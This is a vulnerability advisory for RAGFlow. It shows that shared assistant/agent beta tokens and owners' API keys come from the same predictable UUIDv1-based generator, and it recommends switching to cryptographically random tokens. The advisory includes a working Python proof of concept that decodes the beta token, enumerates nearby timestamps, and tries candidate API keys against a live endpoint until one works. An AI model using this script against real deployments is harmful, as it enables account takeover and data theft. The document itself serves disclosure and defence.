Predictable Token Generation Leading to Authentication Bypass Vulnerability

Summary

The API key and the beta token (used for assistant/agent share authentication) are generated by the same insecure algorithm, which makes each token derivable from the other. Specifically, both tokens are produced by a URLSafeTimedSerializer with predictable inputs, so an unauthorized user who obtains a shared assistant/agent URL can derive the owner's personal API key. This grants them full control over the assistant/agent owner's account.

Details

The issue originates in the token generation process at /api/apps/system_app.py#L214-215, where the API key (token) and the beta token are generated almost simultaneously by the generate_confirmation_token function (/api/utils/api_utils.py#L378). This function constructs a URLSafeTimedSerializer with tenant_id as the secret_key and serializes the output of get_uuid(), using tenant_id as the salt as well. The serialized string is sliced with [2:34], and the result is prefixed with "ragflow-".

The URLSafeTimedSerializer (from itsdangerous, see documentation) serializes the input data (a UUIDv1 hex string from get_uuid()) to JSON, encodes it in URL-safe base64, and appends a timestamp and a signature, each separated by a ".". For example, calling s.dumps("b4f3ce1a992911f0bf61325096b39f47") produces:

ImI0ZjNjZTFhOTkyOTExZjBiZjYxMzI1MDk2YjM5ZjQ3Ig.aNO7XA.-gBAm-REn4flryA-UD0uxFO-VXo

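Decoding the base64 portion before the first . yields the original UUIDv1 ("b4f3ce1a992911f0bf61325096b39f47") as a quoted JSON string. That portion is 46 characters long, so the [2:34] slice falls entirely inside it: the token is simply part of the base64-encoded plaintext UUIDv1 and contains none of the signature.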
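The slicing described above can be reproduced with the standard library alone. The following is a minimal sketch, not the project's code: payload_segment and exposed_hex_digits are hypothetical helper names, and the sketch assumes the payload is the compact JSON encoding of the UUID hex string, as the example output above indicates.

```python
import base64
import json


def payload_segment(uuid_hex):
    """Base64url-encode the compact JSON form of uuid_hex, without '=' padding.

    Hypothetical helper that mirrors the first '.'-separated segment of the
    serializer output shown above.
    """
    raw = json.dumps(uuid_hex, separators=(",", ":")).encode("utf-8")
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def exposed_hex_digits(token_body):
    """Return UUID hex digits 1..22 recovered from a 32-character token body."""
    # "Ij" stands in for the two base64 characters removed by the slice; it
    # decodes to '"' plus a placeholder high nibble for the first hex digit.
    # Only the first 30 characters are used so that the input is a whole
    # number of 4-character base64 groups.
    decoded = base64.urlsafe_b64decode("Ij" + token_body[:30]).decode("ascii")
    return decoded[2:]  # skip the quote and the unreliable first digit


uuid_hex = "b4f3ce1a992911f0bf61325096b39f47"
segment = payload_segment(uuid_hex)
token_body = segment[2:34]  # the same slice the advisory describes

print(segment)
print(token_body)
print(exposed_hex_digits(token_body))
```

No secret key appears anywhere in this sketch, which is the point: the token body can be rebuilt, and mostly decoded, by anyone who knows the UUID or sees a token.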

Per the UUIDv1 specification (RFC 9562), the first 64 bits carry a 60-bit timestamp, counted in 100 ns intervals and split across the time_low, time_mid, and time_high fields, plus the 4-bit version. The [2:34] slice covers nearly all of the first 25 hexadecimal digits of the UUIDv1 (roughly bits [2,98]), so it includes all three timestamp fields. Since the API key and beta token are generated almost simultaneously on the same system, their timestamps are nearly identical and the gap between them varies little. This predictability allows an attacker to start from the beta token, enumerate the few plausible timestamp values, recover the API key in a small number of attempts, and perform unauthorized operations.
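To make the field layout concrete, the sketch below splits the example UUID from this advisory into its timestamp fields using Python's uuid module. The helper name describe_uuid1 and the dictionary keys are illustrative assumptions, not part of the affected code.

```python
import uuid
from datetime import datetime, timedelta, timezone

# UUIDv1 timestamps count 100 ns ticks since the start of the Gregorian calendar.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def describe_uuid1(uuid_hex):
    """Split a UUIDv1 hex string into its timestamp fields (illustrative helper)."""
    u = uuid.UUID(hex=uuid_hex)
    ticks = u.time  # the 60-bit timestamp reassembled from the three fields
    return {
        "version": u.version,
        "time_low": u.time_low,                      # lowest 32 bits of the timestamp
        "time_mid": u.time_mid,                      # next 16 bits
        "time_high": u.time_hi_version & 0x0FFF,     # top 12 bits, version masked off
        "ticks": ticks,
        "created": GREGORIAN_EPOCH + timedelta(microseconds=ticks // 10),
    }


info = describe_uuid1("b4f3ce1a992911f0bf61325096b39f47")
for name, value in info.items():
    print(name, value)
```

Two UUIDs created within the same fraction of a millisecond differ only in the low-order bits of time_low, which is why the PoC below rewrites only that field.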

PoC

Note: To demonstrate the vulnerability, the following steps are suggested:

Clone the repository and set up the environment (e.g., install dependencies, configure the server).
Generate a beta token and API key using the application.
Recover the UUIDv1 time_low field from the beta token by re-padding and base64-decoding its leading characters, which undoes the effect of the [2:34] slice for that field.
Enumerate candidate API keys by varying time_low over the small, predictable range around the beta token's value.
Use the derived API key to perform privileged actions, verifying unauthorized access.

The following Python script decodes the beta token, constructs candidate tokens, and tries each one in an API call:

import base64
import requests

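def from_token_to_ts_low(t):
    """Recover the UUIDv1 time_low field (first 8 hex digits) from a token."""
    if t.startswith("ragflow-"):
        t = t[8:]
    # The [2:34] slice dropped the first two base64 characters. Prepending "Ij"
    # restores 4-character alignment; it decodes to '"' plus a placeholder high
    # nibble, so the first hex digit always decodes as '0'-'9'. That nibble is
    # dropped again when from_ts_low_to_token() re-slices the encoding.
    tpad = "Ij" + t[:10]
    tt = base64.b64decode(tpad).decode("utf-8")
    assert tt[0] == '"'
    return int(tt[1:], 16)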

def from_ts_low_to_token(ts, token):
    """Rebuild a token body with its time_low field replaced by ts."""
    if token.startswith("ragflow-"):
        token = token[8:]
    # Encode '"' + 8 hex digits + '"', then keep base64 characters 2..11,
    # which overwrite the first 10 characters of the token body.
    th = format(ts, "08x")
    tpad = '"' + th + '"'
    tenc = base64.b64encode(tpad.encode("utf-8")).decode("utf-8")
    return tenc[2:12] + token[10:]

def api_call_with_token_attempt(token, base_url):
    # Try the candidate token against an endpoint that requires authentication.
    try:
        response = requests.get(
            base_url + "api/v1/datasets",
            headers={"Authorization": f"Bearer {token}"},
            timeout=10,
        )
        data = response.json()
        if data['code'] == 0:
            print("API call successful")
            return True
        print(f"API call failed: HTTP status {response.status_code}, code {data['code']}")
        return False
    except Exception as e:
        print(f"API call failed with exception: {e}")
        return False

beta = "I0ZjNjZTFhOTkyOTExZjBiZjYxMzI1MD"
beta_low = from_token_to_ts_low(beta)


base_url = "https://example.com/"

# Search strategy: in local tests the time_low gap between the API key and the
# beta token was always a multiple of 10 ticks (1 tick = 100 ns) and averaged
# about 2500 ticks (250 microseconds). Starting from that gap, try 2500, 2510,
# 2520, ... in both directions (API key created before or after the beta token).
middle = 2500
attempt_count = 100
for delta in range(middle, middle + attempt_count * 10 // 2, 10):
    for sign in [1, -1]:
        new_ts_low = beta_low - sign * delta
        new_token = from_ts_low_to_token(new_ts_low, beta)
        # Sanity check: the rebuilt token must decode to the intended time_low.
        decoded_ts_low = from_token_to_ts_low(new_token)
        assert decoded_ts_low == new_ts_low, f"failed for delta {sign * delta}: got {decoded_ts_low}, expected {new_ts_low}"
        print(f"delta {sign * delta}: new_token {new_token}, decoded_ts_low {decoded_ts_low}")
        # Use the candidate token in an API call.
        new_token_with_prefix = "ragflow-" + new_token
        success = api_call_with_token_attempt(new_token_with_prefix, base_url)
        if success:
            print(f"Success with delta {sign * delta}")
            print(f"Found valid token: {new_token_with_prefix}")
            # Stop at the first valid token.
            raise SystemExit(0)

Impact

This is a critical authentication bypass vulnerability. An attacker who obtains the shared assistant/agent URL (containing the beta token) can derive the API key, granting full control over the account, including access to sensitive data and privileged operations. All users who share assistant/agent URLs are impacted.

Mitigation Suggestions

Replace UUIDv1 with UUIDv4 for token generation to ensure randomness (/api/utils/__init__.py#L343). UUIDv4 eliminates the predictable timestamp component.
Remove the unnecessary URLSafeTimedSerializer wrapping: the [2:34] slice discards its signature, so all that remains is predictable base64-encoded plaintext.
Implement a cryptographically secure random token generator (e.g., Python’s secrets module) for both API keys and beta tokens.
Ensure tokens are sufficiently long and unique to prevent enumeration attacks.
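
As an illustration of the suggestions above, tokens could be drawn directly from the operating system's CSPRNG through Python's secrets module. This is a minimal sketch under stated assumptions, not the project's actual fix: the function name new_token and the 32-byte size are illustrative, and only the "ragflow-" prefix is taken from this advisory.

```python
import secrets

TOKEN_PREFIX = "ragflow-"  # prefix from the advisory; everything else is illustrative


def new_token(nbytes=32):
    """Return a prefixed token backed by nbytes of CSPRNG output (hypothetical helper)."""
    # token_urlsafe() returns URL-safe base64 text with no timestamp or host
    # component, so one token reveals nothing about another.
    return TOKEN_PREFIX + secrets.token_urlsafe(nbytes)


api_key = new_token()
beta_token = new_token()
print(api_key)
print(beta_token)
```

Because each call draws fresh random bytes, generating the API key and the beta token back to back no longer links them.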

Weaknesses

Generation of Predictable Numbers or Identifiers
